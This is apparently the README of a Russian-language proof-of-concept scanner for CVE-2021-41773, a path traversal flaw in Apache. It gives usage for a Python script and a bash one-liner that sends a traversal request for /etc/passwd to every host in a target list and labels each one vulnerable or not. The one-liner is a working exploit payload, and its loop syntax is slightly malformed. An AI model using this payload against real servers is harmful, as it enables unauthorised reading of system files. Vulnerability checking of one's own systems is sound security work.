
Сканер доказательства концепции для CVE-2021-41773 (обход пути в Apache). Проверяет хосты на уязвимость, отправляя специально созданные HTTP-запросы и анализируя ответы на наличие индикаторов компрометации.
Быстрое и грязное доказательство концепции для проверки, уязвимы ли хосты к CVE-2021-41773
python3 full.py hosts.txt
Где hosts.txt содержит ваши цели:
domain.com
blah.com
192.168.1.1
Он выведет, уязвим ли хост или нет.
Python-версия bash:
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
Наслаждайтесь!